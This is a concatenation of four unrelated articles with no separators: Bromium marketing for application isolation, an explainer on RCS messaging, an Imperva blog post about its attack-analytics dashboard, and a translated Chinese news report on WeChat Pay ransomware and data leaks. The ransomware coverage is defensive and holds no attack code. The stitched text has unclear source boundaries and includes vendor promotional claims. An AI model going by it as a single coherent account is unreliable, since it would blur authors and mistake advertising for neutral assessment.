Denial is not a strategy. The reality is that networks, PCs and XenApp clients are susceptible to attacks, if they haven’t been breached already. Network segmentation is an imperative. Organizations need to isolate applications that contain sensitive data, but this approach can introduce the cost and hassle of issuing a second PC for authorized users. Establish true end-to-end protections around sensitive assets in applications, no second PC required, with Bromium Protected App.

The Challenge: The Flaws in Existing Defenses and the Network Segmentation Mandate

Security teams continue to introduce new protection mechanisms and additional layers of defense. Today, a typical organization is running a virtual alphabet soup of perimeter defenses: think AV, IDS, IPS and many other systems. While these respective tools remain important, they’re not foolproof. Especially when tested against sophisticated cyber threats, these defenses continue to prove vulnerable.

If you’re responsible for security, you must assume that endpoints and networks are compromised, or soon will be, and can’t be trusted. That means sensitive data, including intellectual property and personally identifiable information, is vulnerable, leaving the business exposed to fines for non-compliance, competitive threats, brand damage, and more.

How do you build trust in an untrustworthy world? These realities are compelling security teams to establish zero-trust architectures via network segmentation. The concept of “zero trust” has its advocates and its detractors, but the bottom line is this: organizations need to create separation between sensitive assets and vulnerable networks and PCs.

That’s why security best practices and compliance mandates like the PCI DSS recommend putting sensitive information, such as payment card data, in a segmented network. By establishing a securely segmented network, organizations can create an isolated domain for sensitive data. As part of this effort, security teams need to establish a way for authorized users to access sensitive data. Historically, these teams have had two options: issuing a dedicated, second PC to authorized users, or employing remote desktop protocol (RDP) or virtual desktop infrastructure (VDI) clients like XenApp. However, each of these approaches presents significant downsides.

Second PC

When security teams issue a second PC, they need to establish two fundamental controls. First, they need to ensure only these dedicated PCs can access applications in the segmented network. Second, they need to make sure these PCs can only access the segmented application and network, and no others.

With these controls in place, organizations can establish clear isolation. However, the issuance of a second PC imposes significant penalties:

- It adds significant effort and complexity for users.
- It creates extra procurement, setup, and maintenance work for technical teams.
- It also adds cost for the business.

Remote Desktop/XenApp Clients

Another option is to have authorized users access the segmented network via RDP or XenApp clients. This approach can be difficult to implement, and it introduces significant security vulnerabilities. Fundamentally, if the host on a user device is compromised, the segmented network will still be vulnerable. RDP is a protocol that is commonly targeted by cyber criminals. While network-level authentication is required in most RDP and XenApp implementations, this security mechanism won’t guard against a hacker using keyloggers, scraping screen contents, or extracting passwords from application memory.

How can your security teams safeguard sensitive applications and data without incurring the cost, effort, and complexity associated with introducing a second PC, or leaving the business exposed to compromised RDP or XenApp clients?

The Solution: Bromium Protected App

With Bromium Protected App, you can establish end-to-end protections around sensitive assets in applications without issuing second PCs to authorized users. The solution enables customers to completely isolate sensitive applications and secure network connections between clients and servers. Protected App ensures sensitive data remains secure, even when networks and PCs get compromised.

Protected App: How it Works

Bromium Protected App offers capabilities for hardware-enforced isolation of remote desktops and XenApp clients. The solution is employed on the user’s Windows PC, beneath the operating system (OS) layer, establishing a protected virtual machine (VM) that is completely isolated from the OS. Even if a user’s endpoint is compromised, it won’t pose any risk to the partitioned, protected application. The user can only access the application through the protected VM, which remains isolated from the Windows OS and any malware that may infect it. Further, Protected App can isolate RDP and XenApp clients from the host PC, so connections to the segmented network can’t be exploited.

Comprehensive Safeguards

Bromium Protected App delivers comprehensive safeguards against malware, compromised host OSs, and even malicious administrators. The solution protects organizations against these threats:

- Keylogging. Keystrokes that users enter while working with Bromium Protected App are invisible to the host. Even if a malicious actor or malware has compromised the host, the host can’t be used to inject keystrokes into the protected VM.
- Memory tampering. Because its memory is isolated from the Windows OS, the VM’s memory is tamper proof.
- Disk tampering. The VM is isolated and, because the disk is encrypted, it can’t be tampered with.
- Kernel exploits. Because the VM is independent of the Windows OS, it isn’t susceptible to a Windows kernel exploit.
- Unauthorized user commands. The solution blocks a number of unauthorized commands, including screen captures, downloads, copy and paste, and printing.
- Man-in-the-middle attacks. The solution encrypts all network traffic between the Bromium Protected App client and the secure server. This means data can’t be viewed in the clear by the user’s host OS or when in transit across the network.

Benefits of Protected App

By implementing Bromium Protected App, your organization can realize a number of benefits:

- Address critical security threats, with unrivaled efficiency and ease. The solution makes it practical to secure the applications that host sensitive data, without having to ensure endpoint devices are free of malware or issue a second PC.
- Establish broad protection against a range of threats. Bromium Protected App enables customers to establish strong safeguards around sensitive applications and data, helping ensure confidentiality and integrity.

What is RCS and why you might want it


A lot of people have become bored with SMS messaging, and the tech industry is very aware of it. While services such as Apple’s iMessage, Facebook Messenger, and WhatsApp allow you to add photos, GIFs and videos to your messages, they are not universal solutions ― for example, you can’t send a WhatsApp message if your correspondent uses Facebook Messenger. The answer ― or so Google and other companies are hoping ― is Rich Communications Services or RCS.

What is RCS?

RCS is a new online protocol that was chosen for adoption by the GSM Association in 2008 and is meant to replace the current texting standard SMS (Short Message Service), which has been around since the 1990s. The GSMA represents a wide variety of organizations in the mobile industry, including device and software companies, internet companies, etc. Naturally, given all those players, it took a while to come to an agreement, and so it wasn’t until 2016 that the GSMA was able to come up with something resembling a standard. Called the Universal Profile, it is, according to the GSMA, a “single, industry-agreed set of features and technical enablers.”

How is RCS better than SMS?

RCS will add a lot more multimedia capabilities to your messaging. Besides the usual texts (plain and fancy), it will make it simple to send GIFs, high-resolution still photos, and videos. It will let you know if the person you’re texting is available, and can send you a receipt to prove they received your message. It will allow you to create longer messages and attach larger files. It also enables much better group messaging than SMS can handle. In other words, it can make standard text messaging look and work a lot like iMessage.

It will also make it easier for companies to interact with their customers. So, for example, RCS will allow you to quickly find out the status of an order, and will provide a way for companies to encourage customer comments on their sites. (Okay, that may not be top of your list of great features.)

As of this writing, support for RCS has been promised by 55 carriers, including AT&T, Verizon, T-Mobile, and a slew of secondary companies; 11 hardware manufacturers, such as Samsung, Lenovo, and LG (but not Apple); and both Microsoft and Google.

Is anyone using RCS yet?

Google, perhaps trying to make up for its elimination of the Allo app , just introduced an RCS-enabled messaging service called, rather confusingly, Chat (to distinguish it from all the other chat apps). Currently, Chat is only available on Pixel 3 and Pixel 3 XL phones that are on the Verizon network.

This means that people with those phones and using that carrier can send RCS messages (via Android Messages) to other people with those phones and using that carrier. If you’ve got Chat, you can still send messages to somebody without the capability ― they will just get normal SMS texts. So it’s a fairly limited try-out, for now.



Google isn’t the only company offering RCS. T-Mobile added Universal Profile version 1.0 of RCS to its Samsung Galaxy S7 and S7 Edge phones in June. Sprint announced it was launching RCS with Universal Profile to its devices in early November, and promised that all its new 2019 devices would come with RCS preloaded. Anything using the “Universal Profile” standard should support cross-carrier messaging ― but if you look at the carrier sites, they only claim to communicate within their networks, and we have not yet been able to test whether RCS-capable T-Mobile or Sprint devices can exchange RCS messages with Pixel 3 phones.

Muddying the waters even more is the fact that some carriers and device makers are currently using RCS, but not the Universal Profile (which is being used by Chat), so their apps and services are not cross-compatible with those being used by other vendors.

Why are people saying it’s not secure?

One issue that a lot of security nerds are pointing out is that RCS ― and, therefore, apps such as Chat ― lack the end-to-end encryption available in some current messaging tools such as WhatsApp. End-to-end encryption means that the message is impenetrable to everyone ― including the app vendor and the network provider ― except the message sender and receiver. You want to text someone with no chance that the authorities will ever see it? Chat / RCS is not the way.

On the other hand, RCS does have all the standard security protocols, including Transport Layer Security ( the underlying tech behind HTTPS ), and IPsec (Internet Protocol Security), which is used in VPNs. So for the most part, it’s pretty secure. Whether you’re comfortable using Chat / RCS depends on your security needs.

So what’s next?

Right now, support for RCS is limited to only a few carriers and even fewer devices, which means that most people can’t yet take advantage of it. Stay tuned to see what ― and who ― follows.

Read: New Attack Analytics Dashboard Streamlines Security Investigations



Attack Analytics , launched this May, aimed to crush the maddening pace of alerts that security teams were receiving. For security analysts unable to triage this avalanche of alerts, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigable incidents. Powered by artificial intelligence, Attack Analytics is able to automate what would take a team of security analysts days to investigate and to cut that investigation time down to a matter of minutes.
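The core idea behind that condensation is clustering: alerts that share key attributes almost always belong to the same underlying attack. As a toy illustration (not Imperva's actual algorithm, and with made-up records), grouping alerts by signature, source, and target already collapses the volume dramatically:

from collections import defaultdict

# Hypothetical alert records; a real WAF emits thousands of these per day.
alerts = [
    {"sig": "SQLi", "src": "203.0.113.7", "host": "shop.example.com"},
    {"sig": "SQLi", "src": "203.0.113.7", "host": "shop.example.com"},
    {"sig": "XSS", "src": "198.51.100.2", "host": "blog.example.com"},
]

incidents = defaultdict(list)
for alert in alerts:
    # Alerts sharing a signature, source, and target collapse into one incident.
    incidents[(alert["sig"], alert["src"], alert["host"])].append(alert)

print(f"{len(alerts)} alerts -> {len(incidents)} incidents")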

Building upon the success of our launch, we are now introducing the Attack Analytics Dashboard. Aimed at SOC (Security Operations Center) analysts, managers, and WAF administrators, it provides a high-level summary of the types of security attacks hitting their web applications, helping to speed up security investigations and quickly zoom in on abnormal behaviors.

The WAF admin or the SOC can use the Dashboard to get a high-level summary of the security attacks that have happened over a period of time (the last 24 hours, 7 days, 30 days, 90 days, or another customized time range):

- Attack Trends: Incidents and events
- Top Geographic Areas: Where attacks have originated
- Top Attacked Resources
- Breakdown of Attack Tool Types
- Top Security Violations (Bad Bots, Illegal Resource Access, SQL injections, Cross-Site Scripting, etc.)

Events vs. incidents

Upon entering the Attack Analytics Dashboard, you can see the Incidents tab, which shows the attack trends across time, classified according to severity (critical, major and minor). A quick scan allows you to understand if a sudden jump in incidents may deserve immediate attention.



In the Events tab, you can see the number of events vs. incidents which have occurred over a specific period of time. For example, the marked point in the graph shows that on October 4th there were 2,142 alerts that were clustered into 19 security incidents. If you want to understand what happened on that day, you can drill down and investigate these 19 incidents.



Next, you can see the Top Attack Origin countries which have attacked your websites over a specified period of time. This again could help identify any abnormal behavior from a specific country. In the snapshot below, you can see the “Distributed” incidents. This means that this customer experienced 4 distributed attacks with no dominant country, which could imply that the attacks originated from botnets spread across the world.


Top attacked resources

Top Attacked Resources provides a snapshot of your most attacked web resources by percentage of critical incidents and the total number of incidents. In this example, singular assets are examined as well as a distributed attack across the customer’s assets. In the 3rd row, you can see that the customer (in this case, our own platform) experienced 191 distributed attacks. This means that each attack targeted a few hosts under our brand name; for example, it may have been a scanning attack aimed at finding vulnerable hosts.


Attack tool types

A SOC Manager/WAF admin might also want to understand the type of attack tools that are being used. In the example below, on the left you see the distribution of incidents according to tool type, and on the right the drill-down into the malicious tools, so you can better understand your attack landscape. Over the last 90 days, there were 2.38K incidents that used malicious tools. On the right, we can see the breakdown of the different tools and the number of incidents for each one; for example, there were 279 incidents with a dominant malicious tool called LTX71.



We think you’ll quickly discover the benefits the new Attack Analytics Dashboard provides as it helps you pinpoint abnormal behaviors and speed up your security investigations. It should also help you give other stakeholders within your company a high-level look at the value of your WAF.

And right now, we have even more dashboard insight enrichments in the works, such as:

- False Positive Suspects: Incidents our algorithms predict are highly likely to be false positives.
- Community Attacks (Spray and Pray Attacks): A list of incidents targeting you as part of a larger campaign, based on information gathered from our crowdsourced customer data.

Stay tuned for more!

*** This is a Security Bloggers Network syndicated blog from Blog, authored by Kim Lambert. Read the original post at: https://www.imperva.com/blog/read-new-attack-analytics-dashboard-streamlines-security-investigations/

Ransomware Sounds the Cybersecurity Alarm as the Black Market Reaches for Personal Information


Your computer’s documents are suddenly encrypted, a new “decrypt” icon appears on the desktop, and clicking it pops up a WeChat Pay payment QR code demanding a transfer of 110 yuan to unlock the files. This is the much-discussed “WeChat Pay” ransomware that surfaced recently. Several security experts note, however, that it is merely a PC virus: it has nothing to do with mobile phone security, nor with the security of WeChat Pay itself.

As the end of the year approaches, scams of every kind keep emerging. With the ubiquity and extremely high usage of QR codes and mobile payments, the technologies that bring so much convenience to our lives are becoming targets for black- and gray-market gangs to besiege and exploit. The recently emerged WeChat Pay ransomware is another reminder to keep a tight grip on the money in our WeChat and Alipay wallets.

In today’s information- and data-driven world, personal information has become a vital data resource, and data security risks are increasingly prominent. Leaks of personal information fuel public anxiety about information security; protecting it requires a joint defense by many parties.

Ransomware strikes again

China recently saw its first ransomware demanding that the ransom be paid through WeChat. The cyber police in Dongguan have since arrested the virus’s author, a man surnamed Luo born after 1995. Luo allegedly used a self-made trojan to break into users’ computers and extort a ransom of 110 yuan per victim by encrypting their files. The virus also illegally harvested more than 50,000 sets of account names and passwords for Taobao, Alipay, Baidu Netdisk, and other services, and more than 100,000 computers across the internet were infected.

According to a report released by Huorong Security, the ransomware encrypts valuable data such as txt and Office documents, drops a shortcut on the victim’s desktop reading “Your computer’s files have been encrypted, click here to decrypt,” and then pops up decryption instructions and a payment QR code to force the victim to pay.

Industry experts point out that although ransomware cases have occurred frequently in recent years, many strains are not very sophisticated. The security team at antivirus vendor Rising rated this ransomware at “elementary school” level: it uses simple XOR encryption, and the key material is stored inside the virus file itself, so the data can be decrypted successfully even without contacting the author’s server.
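To see why “elementary school” is apt: XOR with a fixed key is its own inverse, so anyone holding the key material shipped in the binary can decrypt without ever contacting the author’s server. A minimal sketch, with a hypothetical key (the real malware’s key and file layout are not reproduced here):

def xor_bytes(data, key):
    """XOR data against a repeating key; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"\x5a"  # hypothetical key; the actual malware stored its key material in the file
ciphertext = xor_bytes(b"important document", key)
assert xor_bytes(ciphertext, key) == b"important document"  # the same operation decrypts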

Still, this ransomware reminded people of WannaCry, the Bitcoin ransomware that swept the globe a year and a half ago. Public figures show that this worldwide internet disaster hit 300,000 users in 150 countries and caused 8 billion US dollars in economic losses. That virus likewise extorted victims by encrypting the important files on their computers; the difference was that victims had to pay in Bitcoin to unlock them.

The black market reaches for personal information

While ransomware proliferates, the online black and gray markets, which also target the public’s wallets, are reaching for personal information as well. Media recently reported that roughly 26 million Momo records were offered for sale online for just 200 yuan, and that hackers breached a hotel database belonging to Marriott International, exposing the information of more than 500 million guests.

Behind these data-leak cases lurk black- and gray-market gangs. Zuo Yingnan, deputy director of the National Engineering Laboratory for Big Data Collaborative Security Technology, says that big data, and personal information in particular, is already regarded as a high-value resource in the underground economy.

The severity of personal information leaks is hard to overstate. At the recent 2018 (3rd) Data Security and Privacy Protection Conference, a consensus emerged on the threat the black and gray industries pose to personal data protection: most leaked data ends up being used by these gangs for fraud and other profit-making schemes, causing serious harm to individuals, society, and the country.

Public figures show that more than 1.5 million people work in China’s online black market, with a market size in the hundreds of billions of yuan. One cause of personal information leaks is company insiders who, driven by profit, take the risk of reselling customers’ personal information. Another major cause is the abuse of mobile app permissions. Many apps demand access to the phone’s location, contacts, and other permissions at install time, and then collect everything the user does on the device, leaving no privacy to speak of. The National Computer Virus Emergency Response Center recently found multiple mobile apps harvesting users’ personal information without their knowledge, leaking their privacy.

Building a solid line of defense for information security

With the end of the year approaching, network information security deserves attention from many quarters of society. Cracking down on the illegal acquisition of citizens’ personal information requires regulators to step up enforcement, the companies that collect the information to shoulder their responsibilities, and consumers to raise their guard.

First, regulators must strike hard and improve the law. In response to repeated leaks, the Ministry of Industry and Information Technology recently said it will launch a special campaign against malicious mobile programs. Industry insiders say that, given the serious social harm of ransomware, the judiciary should weigh the circumstances of each crime and prosecute under the more serious offense (extortion), making criminals pay a higher price under the law.

Second, the legal responsibility of online platforms must be strengthened. Hacking techniques keep evolving, but platforms should stay a step ahead. The China Consumers Association recently reported that personal information leakage by mobile apps is extremely serious. Platforms should proactively screen for hidden risks, strengthen technical protections, and improve their security management systems; network operators that fall short in their protection duties should be held accountable.

Finally, consumers need to stay vigilant. They should grant sensitive permissions sparingly, think twice before registering for apps or scanning QR codes, avoid reusing the same username and password across different sites, and choose harder-to-guess passwords. PC users should get into the habit of backing up important data and files and should download and install software only through legitimate channels. If hit by ransomware, do not pay; report it to the police promptly.
